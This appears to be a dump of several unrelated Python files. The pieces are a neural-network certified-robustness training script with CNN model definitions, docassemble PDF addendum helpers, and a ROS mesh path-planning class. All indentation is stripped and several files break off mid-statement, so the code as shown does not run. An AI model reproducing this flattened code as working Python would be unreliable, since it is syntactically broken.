#~ data_test.mult(data_test, target = t6_test) # DxP
#~ t6_test.sum(axis = 0, target = lengthsq_test) # 1xP
#~ lengthsq_test.mult(1./num_vis) # normalize by number of components (like std)
#~ lengthsq_test.add(small) # small avoids division by 0
#~ cmt.sqrt(lengthsq_test, target = length_test)
#~ length_test.reciprocal(target = normcoeff_test) # 1xP
#~ data_test.mult_by_row(normcoeff_test, target = normdata_test) # normalized data
for batch in range(num_batches):
# get current minibatch
data = dev_dat.slice(batch*self.batch_size,(batch + 1)*self.batch_size) # DxP (nr dims x nr samples)
# normalize input data
data.mult(data, target = t6) # DxP
t6.sum(axis = 0, target = lengthsq) # 1xP
lengthsq.mult(1./num_vis) # normalize by number of components (like std)
lengthsq.add(small) # small avoids division by 0
cmt.sqrt(lengthsq, target = length)
length.reciprocal(target = normcoeff) # 1xP
data.mult_by_row(normcoeff, target = normdata) # normalized data
## compute positive sample derivatives
# covariance part
cmt.dot(VF.T, normdata, target = feat) # HxP (nr facs x nr samples)
feat.mult(feat, target = featsq) # HxP
cmt.dot(FH.T,featsq, target = t1) # OxP (nr cov hiddens x nr samples)
t1.mult(-0.5)
t1.add_col_vec(bias_cov) # OxP
t1.apply_sigmoid(target = t2) # OxP
cmt.dot(featsq, t2.T, target = FHinc) # HxO
cmt.dot(FH,t2, target = t3) # HxP
t3.mult(feat)
| |
<reponame>sungyoon-lee/bcp
# -*- coding: utf-8 -*-
### basic modules
import numpy as np
import time, pickle, os, sys, json, PIL, tempfile, warnings, importlib, math, copy, shutil
### torch modules
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR, MultiStepLR
import torch.nn.functional as F
from torch import autograd
from torch.utils.data import Dataset, DataLoader, TensorDataset
from torch.optim.lr_scheduler import StepLR, MultiStepLR
import argparse
def argparser(data='cifar10', model='large',
batch_size=128, epochs=200, warmup=10, rampup=121,
augmentation=True,
seed=0, verbose=200,
epsilon=36/255, epsilon_infty=8/255, epsilon_train=36/255, epsilon_train_infty=8/255, starting_epsilon=0.0,
opt='adam', lr=0.001, momentum=0.9, weight_decay=0.0, step_size=10, gamma=0.5, lr_scheduler='step', wd_list=None,
starting_kappa=1.0, kappa=0.0,
niter=100,
opt_iter=1, sniter=1, test_opt_iter=1000, test_sniter=1000000):
parser = argparse.ArgumentParser()
# main settings
parser.add_argument('--method', default='BCP')
parser.add_argument('--rampup', type=int, default=rampup) ## rampup
parser.add_argument('--warmup', type=int, default=warmup)
parser.add_argument('--sniter', type=int, default=sniter) ###
parser.add_argument('--opt_iter', type=int, default=opt_iter)
parser.add_argument('--linfty', action='store_true')
parser.add_argument('--no_save', action='store_true')
parser.add_argument('--test_pth', default=None)
parser.add_argument('--print', action='store_true')
parser.add_argument('--bce', action='store_true')
parser.add_argument('--pgd', action='store_true')
# optimizer settings
parser.add_argument('--opt', default='adam')
parser.add_argument('--momentum', type=float, default=momentum)
parser.add_argument('--weight_decay', type=float, default=weight_decay)
parser.add_argument('--epochs', type=int, default=epochs)
parser.add_argument("--lr", type=float, default=lr)
parser.add_argument("--step_size", type=int, default=step_size)
parser.add_argument("--gamma", type=float, default=gamma)
parser.add_argument("--wd_list", nargs='*', type=int, default=wd_list)
parser.add_argument("--lr_scheduler", default=lr_scheduler)
# test settings during training
parser.add_argument('--train_method', default='BCP')
parser.add_argument('--test_sniter', type=int, default=test_sniter)
parser.add_argument('--test_opt_iter', type=int, default=test_opt_iter)
# pgd settings
parser.add_argument("--epsilon_pgd", type=float, default=epsilon)
parser.add_argument("--alpha", type=float, default=epsilon/4)
parser.add_argument("--niter", type=float, default=niter)
# epsilon settings
parser.add_argument("--epsilon", type=float, default=epsilon)
parser.add_argument("--epsilon_infty", type=float, default=epsilon_infty)
parser.add_argument("--epsilon_train", type=float, default=epsilon_train)
parser.add_argument("--epsilon_train_infty", type=float, default=epsilon_train_infty)
parser.add_argument("--starting_epsilon", type=float, default=starting_epsilon)
parser.add_argument('--schedule_length', type=int, default=rampup) ## rampup
# kappa settings
parser.add_argument("--kappa", type=float, default=kappa)
parser.add_argument("--starting_kappa", type=float, default=starting_kappa)
parser.add_argument('--kappa_schedule_length', type=int, default=rampup) ## rampup
# model arguments
parser.add_argument('--model', default='large')
parser.add_argument('--model_factor', type=int, default=8)
parser.add_argument('--resnet_N', type=int, default=1)
parser.add_argument('--resnet_factor', type=int, default=1)
# other arguments
parser.add_argument('--prefix')
parser.add_argument('--data', default=data)
parser.add_argument('--real_time', action='store_true')
parser.add_argument('--seed', type=int, default=2019)
parser.add_argument('--verbose', type=int, default=200)
parser.add_argument('--cuda_ids', type=int, default=0)
# loader arguments
parser.add_argument('--batch_size', type=int, default=batch_size)
parser.add_argument('--test_batch_size', type=int, default=batch_size)
parser.add_argument('--normalization', action='store_true')
parser.add_argument('--no_augmentation', action='store_true', default=not(augmentation))
parser.add_argument('--drop_last', action='store_true')
parser.add_argument('--no_shuffle', action='store_true')
args = parser.parse_args()
args.augmentation = not(args.no_augmentation)
args.shuffle = not(args.no_shuffle)
args.save = not(args.no_save)
if args.rampup:
args.schedule_length = args.rampup
args.kappa_schedule_length = args.rampup
if args.epsilon_train is None:
args.epsilon_train = args.epsilon
if args.epsilon_train_infty is None:
args.epsilon_train_infty = args.epsilon_infty
if args.linfty:
print('LINFTY TRAINING')
args.epsilon = args.epsilon_infty
args.epsilon_train = args.epsilon_train_infty
args.epsilon_pgd = args.epsilon
args.alpha = args.epsilon/4
if args.starting_epsilon is None:
args.starting_epsilon = args.epsilon
if args.prefix:
args.prefix = 'models/'+args.data+'/'+args.prefix
if args.model is not None:
args.prefix += '_'+args.model
if args.method is not None:
args.prefix += '_'+args.method
banned = ['verbose', 'prefix',
'resume', 'baseline', 'eval',
'method', 'model', 'cuda_ids', 'load', 'real_time',
'test_batch_size', 'augmentation','batch_size','drop_last','normalization',
'print','save','step_size','epsilon','gamma','linfty','lr_scheduler',
'seed','shuffle','starting_epsilon','kappa','kappa_schedule_length',
'test_sniter','test_opt_iter', 'niter','epsilon_pgd','alpha','schedule_length',
'epsilon_infty','epsilon_train_infty','test_pth','wd_list','momentum', 'weight_decay',
'resnet_N', 'resnet_factor','bce','no_augmentation','no_shuffle','no_save','pgd']
if args.method == 'baseline':
banned += ['epsilon', 'starting_epsilon', 'schedule_length',
'l1_test', 'l1_train', 'm', 'l1_proj']
# if not using a model that uses model_factor,
# ignore model_factor
if args.model not in ['wide', 'deep']:
banned += ['model_factor']
for arg in sorted(vars(args)):
if arg not in banned and getattr(args,arg) is not None:
args.prefix += '_' + arg + '_' +str(getattr(args, arg))
if args.schedule_length > args.epochs:
raise ValueError('Schedule length for epsilon ({}) is greater than '
'number of epochs ({})'.format(args.schedule_length, args.epochs))
else:
args.prefix = 'models/'+args.data+'/temporary'
if args.cuda_ids is not None:
print('Setting CUDA_VISIBLE_DEVICES to {}'.format(args.cuda_ids))
# os.environ['CUDA_VISIBLE_DEVICES'] = args.cuda_ids
torch.cuda.set_device(args.cuda_ids)
return args
def select_model(data, m):
if data=='mnist':
if m == 'large': ### Wong et al. large
model = mnist_model_large().cuda()
elif m == 'large2': ### Wong et al. large
model = mnist_model_large2().cuda()
else: ### Wong et al. small
model = mnist_model().cuda()
elif data=='cifar10':
if m == 'large': ### Wong et al. large
model = cifar_model_large().cuda()
elif m == 'M': ### CROWN-IBP M
model = cifar_model_M().cuda()
elif m == 'CIBP': ### CROWN-IBP
print('CIBP model')
model = model_cnn_4layer(3,32,8,512).cuda()
elif m == 'CIBP_noinit': ### CROWN-IBP
print('CIBP model no init')
model = model_cnn_4layer_noinit(3,32,8,512).cuda()
elif m == 'c6f2':
model = c6f2().cuda()
elif m == 'c6f2_':
model = c6f2_().cuda()
else: ### Wong et al. small
model = cifar_model().cuda()
elif data=='tinyimagenet':
model = tinyimagenet().cuda()
return model
def mnist_model():
model = nn.Sequential(
nn.Conv2d(1, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(32*7*7,100),
nn.ReLU(),
nn.Linear(100, 10)
)
return model
def mnist_model_large():
model = nn.Sequential(
nn.Conv2d(1, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(64*7*7,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
return model
def mnist_model_large2():
model = nn.Sequential(
nn.Conv2d(1, 32, 3, stride=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(1024,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
return model
def cifar_model():
model = nn.Sequential(
nn.Conv2d(3, 16, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(16, 32, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(32*8*8,100),
nn.ReLU(),
nn.Linear(100, 10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def cifar_model_large():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(64*8*8,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def model_cnn_4layer(in_ch, in_dim, width, linear_size):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size,linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def model_cnn_4layer_noinit(in_ch, in_dim, width, linear_size):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size,linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
# for m in model.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# m.bias.data.zero_()
return model
def cifar_model_M():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(64*8*8,512),
nn.ReLU(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def c5f2():
model = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=2),
nn.ReLU(),
nn.Conv2d(64, 128, 3, stride=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=2),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(512,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
# def c6f2():
# model = nn.Sequential(
# nn.Conv2d(3, 32, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(32, 32, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(32, 32, 4, stride=2, padding=1),
# nn.ReLU(),
# nn.Conv2d(32, 64, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(64, 64, 3, stride=1, padding=1),
# nn.ReLU(),
# nn.Conv2d(64, 64, 4, stride=2),
# nn.ReLU(),
# Flatten(),
# nn.Linear(3136,512),
# nn.ReLU(),
# nn.Linear(512,10)
# )
# for m in model.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# m.bias.data.zero_()
# return model
def c6f2_():
model = nn.Sequential(
nn.Conv2d(3, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(32, 32, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(4096,512),
nn.ReLU(),
nn.Linear(512,10)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
def tinyimagenet():
model = nn.Sequential(
nn.Conv2d(3, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 4, stride=2),
nn.ReLU(),
nn.Conv2d(64, 128, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 4, stride=2),
nn.ReLU(),
nn.Conv2d(128, 256, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(256, 256, 4, stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(9216,256),
nn.ReLU(),
nn.Linear(256,200)
)
for m in model.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
return model
############################## Flatten / one_hot
class Flatten(nn.Module): ## =nn.Flatten()
def forward(self, x):
return x.view(x.size()[0], -1)
def one_hot(batch,depth=10):
ones = torch.eye(depth).cuda()
return ones.index_select(0,batch)
##############################
def train(loader, model, | |
<gh_stars>0
from docassemble.base.util import log, word, DADict, DAList, DAObject, DAFile, DAFileCollection, DAFileList, defined, value, pdf_concatenate, DAOrderedDict, action_button_html, include_docx_template
import re
def label(dictionary):
try:
return list(dictionary.items())[0][1]
except:
return ''
def key(dictionary):
try:
return list(dictionary.items())[0][1]
except:
return ''
def safeattr(object, key):
try:
if isinstance(object, dict) or isinstance(object, DADict):
return str(object.get(key,''))
elif isinstance(object, DAObject):
return str(getattr(object, key))
else:
return ''
except:
return ""
def html_safe_str( the_string ):
"""
Return a string that can be used as an html class or id
"""
return re.sub( r'[^A-Za-z0-9]+', '_', the_string )
def table_row( obj, key='final' ):
"""
Return a string of html that is one row of a table containing
the `.as_pdf()` contents of an AL object and it's interaction buttons
"""
pdf = obj.as_pdf(key=key)
html = '\n\t<tr>'
html += '\n\t\t<td><i class="fas fa-file"></i> </td>'
html += '\n\t\t<td>' + obj.title + ' </td>'
html += '\n\t\t<td>'
html += action_button_html( pdf.url_for(), label=word("View"), icon="eye", color="secondary" )
html += ' </td>'
html += '\n\t\t<td>'
html += action_button_html( pdf.url_for(attachment=True), label=word("Download"), icon="download", color="primary" )
html += '</td>'
html += '\n\t</tr>'
return html
class ALAddendumField(DAObject):
"""
Object representing a single field and its attributes as related to whether
it should be displayed in an addendum. Useful for PDF templates.
The items can be strings or lists/list-like objects. It does not know
how to handle overflow for a dictionary, e.g.
Required attributes:
- field_name->str represents the name of a docassemble variable
- overflow_trigger->int
Optional/planned (not implemented yet):
- headers->dict(attribute: display label for table)
- field_style->"list"|"table"|"string" (optional: defaults to "string")
"""
def init(self, *pargs, **kwargs):
super(ALAddendumField, self).init(*pargs, **kwargs)
def overflow_value(self, preserve_newlines=False, input_width=80, overflow_message = ""):
"""
Try to return just the portion of the variable (list-like object or string)
that exceeds the overflow trigger. Otherwise, return empty string.
If newlines are preserved, we will use a heuristic to estimate line breaks instead
of using absolute character limit.
"""
last_char = max(len(self.safe_value(overflow_message = overflow_message, input_width=input_width, preserve_newlines=True)) - (max(len(overflow_message)-1,0)), 0)
if preserve_newlines and isinstance(self.value_if_defined(),str):
# start where the safe value ends
return self.value_if_defined()[last_char:]
if isinstance(self.value_if_defined(),str):
return self.value_if_defined()[last_char:]
return self.value_if_defined()[self.overflow_trigger:]
def max_lines(self, input_width=80, overflow_message_length=0):
"""
Estimate the number of rows in the field in the output document.
"""
return int(max(self.overflow_trigger-overflow_message_length,0) / input_width) + 1
def value(self):
"""
Return the full value, disregarding overflow. Could be useful in addendum
if you want to show the whole value without making user flip back/forth between multiple
pages.
"""
return self.value_if_defined()
def safe_value(self, overflow_message = "", input_width=80, preserve_newlines=False):
"""
Try to return just the portion of the variable
that is _shorter than_ the overflow trigger. Otherwise, return empty string.
"""
# Handle simplest case first
value = self.value_if_defined()
if isinstance(value, str) and len(value) <= self.overflow_trigger and (value.count('\r') + value.count('\n')) == 0:
return value
max_lines = self.max_lines(input_width=input_width,overflow_message_length=len(overflow_message))
max_chars = max(self.overflow_trigger - len(overflow_message),0)
# If there are at least 2 lines, we can ignore overflow trigger.
# each line will be at least input_width wide
if preserve_newlines and max_lines > 1:
if isinstance(value, str):
# Replace all new line characters with just \n. \r\n inserts two lines in a PDF
value = re.sub(r"[\r\n]+|\r+|\n+",r"\n",value).rstrip()
line = 1
retval = ""
paras = value.split('\n')
para = 0
while line <= max_lines and para < len(paras):
# add the whole paragraph if less than width of input
if len(paras[para]) <= input_width:
retval += paras[para] + "\n"
line += 1
para += 1
else:
# Keep taking the first input_width characters until we hit max_lines
# or we finish the paragraph
while line <= max_lines and len(paras[para]):
retval += paras[para][:input_width]
paras[para] = paras[para][input_width:]
line += 1
if not len(paras[para]):
para += 1
retval += "\n"
# TODO: check logic here to only add overflow message when we exceed length
if len(paras) > para:
return retval.rstrip() + overflow_message # remove trailing newline before adding overflow message
else:
return retval
# Strip newlines from strings
if isinstance(value, str):
if len(value) > self.overflow_trigger:
return re.sub(r"[\r\n]+|\r+|\n+"," ",value).rstrip()[:max_chars] + overflow_message
else:
return re.sub(r"[\r\n]+|\r+|\n+"," ",value).rstrip()[:max_chars]
# If the overflow item is a list or DAList
if isinstance(value, list) or isinstance(value, DAList):
return value[:self.overflow_trigger]
else:
# We can't slice objects that are not lists or strings
return value
def value_if_defined(self):
"""
Return the value of the field if it is defined, otherwise return an empty string.
Addendum should never trigger docassemble's variable gathering.
"""
if defined(self.field_name):
return value(self.field_name)
return ""
def __str__(self):
return str(self.value_if_defined())
def columns(self):
"""
Return a list of the columns in this object.
"""
if hasattr(self, 'headers'):
return self.headers
else:
# Use the first row as an exemplar
try:
first_value = self.value_if_defined()[0]
if isinstance(first_value, dict) or isinstance(first_value, DADict):
return list([{key:key} for key in first_value.keys()])
elif isinstance(first_value, DAObject):
attr_to_ignore = {'has_nonrandom_instance_name','instanceName','attrList'}
return [{key:key} for key in list( set(first_value.__dict__.keys()) - attr_to_ignore )]
except:
return None
# None means the value has no meaningful columns we can extract
def type(self):
"""
list | object_list | other
"""
value = self.value_if_defined()
if isinstance(value, list) or isinstance(value, DAList):
if len(value) and (isinstance(value[0], dict) or isinstance(value[0], DADict) or isinstance(value[0], DAObject)):
return "object_list"
return "list"
return "other"
def is_list(self):
"""
Identify whether the field is a list, whether of objects/dictionaries or just plain variables.
"""
return self.type() == 'object_list' or self.type() == 'list'
def is_object_list(self):
"""
Identify whether the field represents a list of either dictionaries or objects.
"""
return self.type() == 'object_list'
def overflow_markdown(self):
"""
Return a formatted markdown table or bulleted list representing the values in the list.
This method does not give you any control over the output other than labels of columns,
but you also do not need to use this output if you want to independently control the format
of the table.
"""
if not self.columns():
if self.overflow_value():
retval = "* "
retval += "\n* ".join(self.overflow_value())
return retval + "\n"
else:
return ""
num_columns = len(self.columns())
header = " | ".join([list(item.items())[0][1] for item in self.columns()])
header += "\n"
header += "|".join(["-----"] * num_columns)
flattened_columns = []
for column in self.columns():
flattened_columns.append(list(column.items())[0][0])
rows = "\n"
for row in self.overflow_value():
if isinstance(row, dict) or isinstance(row, DADict):
row_values = []
for column in flattened_columns:
row_values.append(str(row.get(column,'')))
rows += "|".join(row_values)
else:
row_values = []
for column in flattened_columns:
# don't trigger collecting attributes that are required to resolve
# to a string
try:
row_values.append(str(getattr(row, column,'')))
except:
row_values.append("")
rows += "|".join(row_values)
rows += "\n"
return header + rows
def overflow_docx(self, path="docassemble.ALDocumentDict:data/templates/addendum_table.docx"):
"""
Light wrapper around insert_docx_template() that inserts a formatted table into a docx
file. If the object in the list is a plain string/int, it returns a bulleted list.
Using this method will not give you any control at all over the formatting, but you can directly
call field.overflow_value() instead of using this method.
"""
return include_docx_template(path, columns=self.columns(), rows=self.overflow_value())
class ALAddendumFieldDict(DAOrderedDict):
"""
Object representing a list of fields in your output document, together
with the character limit for each field.
Provides convenient methods to determine if an addendum is needed and to
control the display of fields so the appropriate text (overflow or safe amount)
is displayed in each context.
Adding a new entry will implicitly set the `field_name` attribute of the field.
optional:
- style: if set to "overflow_only" will only display the overflow text
"""
def init(self, *pargs, **kwargs):
super(ALAddendumFieldDict, self).init(*pargs, **kwargs)
self.object_type = ALAddendumField
self.auto_gather=False
if not hasattr(self, 'style'):
self.style = 'overflow_only'
if hasattr(self, 'data'):
self.from_list(data)
del self.data
def initializeObject(self, *pargs, **kwargs):
"""
When we create a new entry implicitly, make sure we also set the .field_name
attribute to the key name so it knows its own field_name.
"""
the_key = pargs[0]
super().initializeObject(*pargs, **kwargs)
self[the_key].field_name = the_key
def from_list(self, data):
for entry in data:
new_field = self.initializeObject(entry['field_name'], ALAddendumField)
new_field.field_name | |
#!/usr/bin/env python
import rospy
import pymesh
import networkx as nx
import multiprocessing
import graph_search
import numpy as np
import time
from scipy import spatial
import mesh_helper
from sklearn.cluster import DBSCAN
import traceback
import pybullet_angle_estimation
import optimization_angle_estimation
class MeshPlannerBase:
"""
Mesh Path Finder given a mesh, a list of metrics and a source and destination points
calculates the optimum paths
"""
def __init__(self, mesh_path, graph_metrics_types):
"""
Mesh Path Finder constructor
:param mesh_path: path to mesh .stl file
:param graph_metrics_types: list of graph metrics types to calculate (GraphMetricType enum object)
"""
self.mesh_path = mesh_path
self.mesh = pymesh.load_mesh(self.mesh_path)
if isinstance(graph_metrics_types, (list, tuple)):
self.graph_metrics_types = graph_metrics_types
elif graph_metrics_types is not None:
self.graph_metrics_types = [self.graph_metrics_types]
else:
raise TypeError("graph_metrics is not a valid object type [list, tuple]")
self.pybullet_angle_client = pybullet_angle_estimation.PybulletAngleEstimation(mesh_path)
self.optimization_angle_client = optimization_angle_estimation.OptimizationAngleEstimation(mesh_path)
# REAL ROBOT CONSTANTS
# self.transversality_threshold = 40 # REAL ROBOT
# self.border_threshold = 0.4 # REAL ROBOT
# SIMULATED ROBOT CONSTANTS
self.transversality_threshold = 30 # max inclination (in degrees) the robot could climb
self.bumpiness_threshold = 0.5 # maximum bump the robot could jump between surfaces TODO add reference here
self.border_threshold = 0.3 # distance to expand from borders to other face centroids
# self.shortest_comb_weight = 0.80
# self.energy_comb_weight = 0.10
# self.transversality_comb_weight = 0.10
self.shortest_comb_weight = 0.25 # this is a shortest weight to combine the weights of the metrics
self.energy_comb_weight = 0.25 # this is a energy weight to combine the weights of the metrics
self.transversality_comb_weight = 0.50 # this is a transversality weight to combine the weights of the metrics
self.mesh.enable_connectivity() # enables connectivity on mesh
self.mesh.add_attribute("face_centroid") # adds the face centroids to be accessed
self.mesh.add_attribute("face_normal") # adds the face normals to be accessed
self.faces = self.mesh.faces
self.centroids = self.mesh.get_face_attribute("face_centroid")
self.normals = self.mesh.get_face_attribute("face_normal")
self.mesh_frontiers = set()
rospy.loginfo("Vertex and Face count: %d, %d" % (self.mesh.num_vertices, self.mesh.num_faces))
rospy.loginfo("Dimensions and Vertexes in a face: %d, %d" % (self.mesh.dim, self.mesh.vertex_per_face))
def plot_graph_3d(self, G, title=None, source_id=None, target_id=None, border_3d_points=None,
reachable_frontiers_ids=None, frontier_centroids_ids=None, frontier_visit_ids=None):
"""Plot the 3D graph using Mayavi (useful for debugging)
:param G: the NetorkX graph
:param title: window title
:param source_id: source node id
:param target_id: target node id
:param border_3d_points: mesh borders points
:param reachable_frontiers_ids: frontier node ids
:param frontier_centroids_ids: frontier centroids ids
:param frontier_visit_ids: the visit point for the frontiers (generally is the closest point to the robot)
:return:
"""
from mayavi import mlab
if not title:
title = 1
mlab.figure(title, bgcolor=(0, 0, 0))
mlab.clf()
g_centroids = [tuple(self.centroids[v]) for v in sorted(G.nodes())]
centroid_gcon_dict = {v: int(i) for i, v in enumerate(g_centroids)}
xyz = np.array(g_centroids)
scalars = xyz[:, 2]
pts = mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scalars,
scale_factor=0.1,
scale_mode='none',
colormap='Blues',
resolution=20)
edge_list = []
for e in G.edges():
e1 = tuple(self.centroids[e[0]])
e2 = tuple(self.centroids[e[1]])
edge_list.append([centroid_gcon_dict[e1], centroid_gcon_dict[e2]])
edge_list = np.array(edge_list)
pts.mlab_source.dataset.lines = np.array(edge_list)
# lines = mlab.pipeline.stripper(pts)
mlab.pipeline.surface(pts, color=(0.2, 0.4, 0.5), line_width=1, opacity=.4)
if border_3d_points and len(border_3d_points) > 0:
xyz_d2 = np.array(border_3d_points)
scalars_d2 = np.ones(xyz_d2.shape[0])
mlab.points3d(xyz_d2[:, 0], xyz_d2[:, 1], xyz_d2[:, 2], scalars_d2,
scale_factor=0.1,
scale_mode='none',
color=(1.0, 0.0, 0.0),
resolution=20)
# add source and target labels
if source_id:
src_3d = self.centroids[source_id]
mlab.text(src_3d[0], src_3d[1], "source", z=src_3d[2], width=0.2)
mlab.points3d([src_3d[0]], [src_3d[1]], [src_3d[2]],
scale_factor=0.25,
scale_mode='none',
color=(0, 1.0, 0.1),
resolution=20)
if target_id:
tgt_3d = self.centroids[target_id]
mlab.text(tgt_3d[0], tgt_3d[1], "target", z=tgt_3d[2], width=0.2)
mlab.points3d([tgt_3d[0]], [tgt_3d[1]], [tgt_3d[2]],
scale_factor=0.25,
scale_mode='none',
color=(0, 0.1, 1.0),
resolution=20)
if reachable_frontiers_ids and len(reachable_frontiers_ids) > 0:
frontiers_3dp = [tuple(self.centroids[v]) for v in reachable_frontiers_ids]
xyz = np.array(frontiers_3dp)
mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scale_factor=0.15,
scale_mode='none',
color=(1.0, 0.1, 1.0),
resolution=20)
if frontier_centroids_ids and len(frontier_centroids_ids) > 0:
centroids_3dp = [tuple(self.centroids[v]) for v in frontier_centroids_ids]
xyz = np.array(centroids_3dp)
mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scale_factor=0.35,
scale_mode='none',
color=(1.0, 0.1, 1.0),
resolution=20)
if frontier_visit_ids and len(frontier_visit_ids) > 0:
centroids_3dp = [tuple(self.centroids[v]) for v in frontier_visit_ids]
xyz = np.array(centroids_3dp)
mlab.points3d(xyz[:, 0], xyz[:, 1], xyz[:, 2],
scale_factor=0.35,
scale_mode='none',
color=(1.0, 0.1, 1.0),
resolution=20)
mlab.show()
def extract_frontiers_from_mesh(self):
"""Extract the face frontiers directly from the mesh file
:return: a set with the ids of the frontier faces
"""
for face_id in range(0, self.mesh.num_faces):
adj_faces = self.mesh.get_face_adjacent_faces(face_id)
if len(adj_faces) <= 2:
self.mesh_frontiers.add(face_id)
return self.mesh_frontiers
def create_graph_from_mesh(self):
"""Create a graph from the mesh's faces centroids conecting nodes using the conectivity graph of the
original mesh
:return: a networkx graph G
"""
G = nx.Graph()
for face_idx in xrange(self.mesh.num_faces):
G.add_node(face_idx)
# add edges for adjacent faces
for face_idx in list(G.nodes()):
face_vertexes = self.mesh.faces[face_idx]
for v in face_vertexes:
